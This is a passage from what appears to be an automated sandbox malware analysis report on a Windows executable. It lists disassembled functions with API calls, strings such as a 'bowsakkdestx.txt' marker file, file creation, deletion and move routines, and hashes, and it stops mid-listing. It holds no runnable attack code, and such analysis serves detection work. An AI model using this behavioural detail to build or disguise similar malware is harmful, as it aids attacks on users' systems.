                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: StringUuid$CreateFree
                                                                                                                                                    • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                                                                                    • API String ID: 3044360575-2335240114
                                                                                                                                                    • Opcode ID: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
                                                                                                                                                    • Instruction ID: 0eb901185732211e3be4e37390737b2086ad5c5ed8a4bd7d6c842829bf201ec1
                                                                                                                                                    • Opcode Fuzzy Hash: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
                                                                                                                                                    • Instruction Fuzzy Hash: 6C21D771208341ABD7209F24D844B9BBBE8AF81758F004E6FF88993291D77A9549879A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040C470 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
                                                                                                                                                    • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Path$AppendFolder
                                                                                                                                                    • String ID: bowsakkdestx.txt
                                                                                                                                                    • API String ID: 29327785-2616962270
                                                                                                                                                    • Opcode ID: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
                                                                                                                                                    • Instruction ID: 3b6c08389df4e48a430741a1ce4ce94f3584f996b8880ee9781e1533d320f445
                                                                                                                                                    • Opcode Fuzzy Hash: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
                                                                                                                                                    • Instruction Fuzzy Hash: 8701DB72B8022873D9306A557C86FFB775C9F51721F0001B7FE08D6181E5E9554646D5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041BA10 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                                                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 0041BA73
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassCursorLoadRegister
                                                                                                                                                    • String ID: 0$LPCWSTRszWindowClass
                                                                                                                                                    • API String ID: 1693014935-1496217519
                                                                                                                                                    • Opcode ID: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                                                                                                                                                    • Instruction ID: 39b267f2af3e8e8601893d5e13e9f0aceec8bb1d15aa8544f670d774de374bdc
                                                                                                                                                    • Opcode Fuzzy Hash: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                                                                                                                                                    • Instruction Fuzzy Hash: 64F0AFB0C042089BEB00DF90D9597DEBBB8BB08308F108259D8187A280D7BA1608CFD9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040C420 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
                                                                                                                                                    • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 0040C45B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Path$AppendDeleteFileFolder
                                                                                                                                                    • String ID: bowsakkdestx.txt
                                                                                                                                                    • API String ID: 610490371-2616962270
                                                                                                                                                    • Opcode ID: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                                                                                                                                                    • Instruction ID: 22f96f022367e4ecd8cb06d74e3ea6c1a096c1ee21cc35b9366b07434c4c4e8f
                                                                                                                                                    • Opcode Fuzzy Hash: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                                                                                                                                                    • Instruction Fuzzy Hash: 60E0807564031C67DB109B60DCC9FD5776C9B04B01F0000B2FF48D10D1D6B495444E55
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00419E70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset
                                                                                                                                                    • String ID: p2Q
                                                                                                                                                    • API String ID: 2102423945-1521255505
                                                                                                                                                    • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                                                                    • Instruction ID: 738f0ca8778653557991c93ab9a04937910ac7dae49cf0696bf478295a84fdc8
                                                                                                                                                    • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                                                                    • Instruction Fuzzy Hash: C5F03028684750A5F7107750BC667953EC1A735B08F404048E1142A3E2D7FD338C63DD
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040ECB0 Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove_strtok
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3446180046-0
                                                                                                                                                    • Opcode ID: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
                                                                                                                                                    • Instruction ID: d0e58e2a66e8e3875a5229d26ee444e1e0210206766639419d48370c530ec9d7
                                                                                                                                                    • Opcode Fuzzy Hash: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
                                                                                                                                                    • Instruction Fuzzy Hash: 7F81B07160020AEFDB14DF59D98079ABBF1FF14304F54492EE40567381D3BAAAA4CB96
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00422130 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2974526305-0
                                                                                                                                                    • Opcode ID: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
                                                                                                                                                    • Instruction ID: 8e6e0b0b404069c1ace538d88af1fa9e5aae20a8402e44ab6f3f0d96efeb0f41
                                                                                                                                                    • Opcode Fuzzy Hash: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
                                                                                                                                                    • Instruction Fuzzy Hash: 9A51D830B00225FBCB148E69AA40A7F77B1AF11320F94436FF825963D0D7B99D61CB69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0043C677 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
                                                                                                                                                    • __isleadbyte_l.LIBCMT ref: 0043C6DB
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C709
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C73F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3058430110-0
                                                                                                                                                    • Opcode ID: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
                                                                                                                                                    • Instruction ID: 9bb69ce0c337472f3e835d3bfc0adb25a23875f1fe15b1d3b69bac0ae3c4b713
                                                                                                                                                    • Opcode Fuzzy Hash: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
                                                                                                                                                    • Instruction Fuzzy Hash: 4E31F530600206EFDB218F75CC85BBB7BA5FF49310F15542AE865A72A0D735E851DF98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040F0E0 Relevance: 6.1, APIs: 4, Instructions: 86filestringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040F125
                                                                                                                                                    • lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040F1A8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$CloseCreateHandleWritelstrlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1421093161-0
                                                                                                                                                    • Opcode ID: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
                                                                                                                                                    • Instruction ID: 4e0a1a2928686de7afe91093b481d52cb6f90b47dd46c4e49af8be4df8d63ea4
                                                                                                                                                    • Opcode Fuzzy Hash: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
                                                                                                                                                    • Instruction Fuzzy Hash: DF31F531A00104EBDB14AF68DC4ABEE7B78EB05704F50813EF9056B6C0D7796A89CBA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004C7094 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ___BuildCatchObject.LIBCMT ref: 004C70AB
                                                                                                                                                      • Part of subcall function 004C77A0: ___BuildCatchObjectHelper.LIBCMT ref: 004C77D2
                                                                                                                                                      • Part of subcall function 004C77A0: ___AdjustPointer.LIBCMT ref: 004C77E9
                                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 004C70C2
                                                                                                                                                    • ___FrameUnwindToState.LIBCMT ref: 004C70D4
                                                                                                                                                    • CallCatchBlock.LIBCMT ref: 004C70F8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2901542994-0
                                                                                                                                                    • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                                                    • Instruction ID: e860502f941f6c9850043d2e9c4655f99114053cf07e0eb82383b029c5c3ae24
                                                                                                                                                    • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                                                    • Instruction Fuzzy Hash: 2C011736000108BBCF526F56CC01FDA3FAAEF48718F15801EF91866121D33AE9A1DFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004253B3 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00425007: __getptd_noexit.LIBCMT ref: 00425008
                                                                                                                                                      • Part of subcall function 00425007: __amsg_exit.LIBCMT ref: 00425015
                                                                                                                                                    • __calloc_crt.LIBCMT ref: 00425A01
                                                                                                                                                      • Part of subcall function 00428C96: __calloc_impl.LIBCMT ref: 00428CA5
                                                                                                                                                    • __lock.LIBCMT ref: 00425A37
                                                                                                                                                    • ___addlocaleref.LIBCMT ref: 00425A43
                                                                                                                                                    • __lock.LIBCMT ref: 00425A57
                                                                                                                                                      • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2580527540-0
                                                                                                                                                    • Opcode ID: 20cae3c5e78afeae97c98bf97395d4880d3d2f78c985c4e7d835da5267c73c74
                                                                                                                                                    • Instruction ID: 8e8bf19fb99f986105457608807abe9f1de148b308aa0ea96eb71ffb67844566
                                                                                                                                                    • Opcode Fuzzy Hash: 20cae3c5e78afeae97c98bf97395d4880d3d2f78c985c4e7d835da5267c73c74
                                                                                                                                                    • Instruction Fuzzy Hash: A3018471742720DBD720FFAAA443B1D77A09F40728F90424FF455972C6CE7C49418A6D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004409B9 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3016257755-0
                                                                                                                                                    • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                                                    • Instruction ID: 47779ad8523d68e9f2e2bd7ddfa488ab055a33a4313e19cc57a45add4f9be60e
                                                                                                                                                    • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                                                    • Instruction Fuzzy Hash: B6014E7240014EBBDF125E85CC428EE3F62BB29354F58841AFE1968131C63AC9B2AB85
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004127A0 Relevance: 6.0, APIs: 4, Instructions: 39stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • lstrlenW.KERNEL32 ref: 004127B9
                                                                                                                                                    • _malloc.LIBCMT ref: 004127C3
                                                                                                                                                      • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                                                                      • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                                                                      • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00680000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                                                                    • _memset.LIBCMT ref: 004127CE
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2824100046-0
                                                                                                                                                    • Opcode ID: 5f096c3e9bb47512b2e803a95e05f57af227ed284e059a7ec7b69b1753ace984
                                                                                                                                                    • Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
                                                                                                                                                    • Opcode Fuzzy Hash: 5f096c3e9bb47512b2e803a95e05f57af227ed284e059a7ec7b69b1753ace984
                                                                                                                                                    • Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00412800 Relevance: 6.0, APIs: 4, Instructions: 28stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • lstrlenA.KERNEL32 ref: 00412806
                                                                                                                                                    • _malloc.LIBCMT ref: 00412814
                                                                                                                                                      • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                                                                      • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                                                                      • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00680000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                                                                    • _memset.LIBCMT ref: 0041281F
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00412832
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2824100046-0
                                                                                                                                                    • Opcode ID: cc716eae1123478769c9b07cafd2d40a616cf11e9764af6c4d9ae2a2154c1c51
                                                                                                                                                    • Instruction ID: a3b2a97d17252553cb1267f0baabe0c67c158e4fedc78561389223423b5350a8
                                                                                                                                                    • Opcode Fuzzy Hash: cc716eae1123478769c9b07cafd2d40a616cf11e9764af6c4d9ae2a2154c1c51
                                                                                                                                                    • Instruction Fuzzy Hash: 74E086767011347BE510235B7C8EFAB665CCBC27A5F50012AF615D22D38E941C0185B4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00414920 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 319COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove
                                                                                                                                                    • String ID: invalid string position$string too long
                                                                                                                                                    • API String ID: 4104443479-4289949731
                                                                                                                                                    • Opcode ID: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                                                                                                                                                    • Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
                                                                                                                                                    • Opcode Fuzzy Hash: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                                                                                                                                                    • Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00417D50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove
                                                                                                                                                    • String ID: invalid string position$string too long
                                                                                                                                                    • API String ID: 4104443479-4289949731
                                                                                                                                                    • Opcode ID: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
                                                                                                                                                    • Instruction ID: 388339a757d446dde0ac97e241c54aefb3b464f1a8010d5a2c21a1bfa385432d
                                                                                                                                                    • Opcode Fuzzy Hash: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
                                                                                                                                                    • Instruction Fuzzy Hash: AC517F317042099BCF24DF19D9808EAB7B6FF85304B20456FE8158B351DB39ED968BE9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041B185 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetUserNameW.ADVAPI32(?,?), ref: 0041B1BA
                                                                                                                                                      • Part of subcall function 004111C0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000,?,?,?), ref: 0041120F
                                                                                                                                                      • Part of subcall function 004111C0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00411228
                                                                                                                                                      • Part of subcall function 004111C0: CloseHandle.KERNEL32(00000000), ref: 0041123D
                                                                                                                                                      • Part of subcall function 004111C0: MoveFileW.KERNEL32(?,?), ref: 00411277
                                                                                                                                                      • Part of subcall function 0041BA10: LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                                                                                                                                                      • Part of subcall function 0041BA10: RegisterClassExW.USER32(00000030), ref: 0041BA73
